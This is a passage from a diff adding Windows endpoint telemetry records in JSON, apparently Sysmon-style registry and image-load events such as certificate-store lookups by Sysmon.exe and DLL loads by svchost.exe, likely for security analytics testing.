Publishing", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880270000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570880580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + 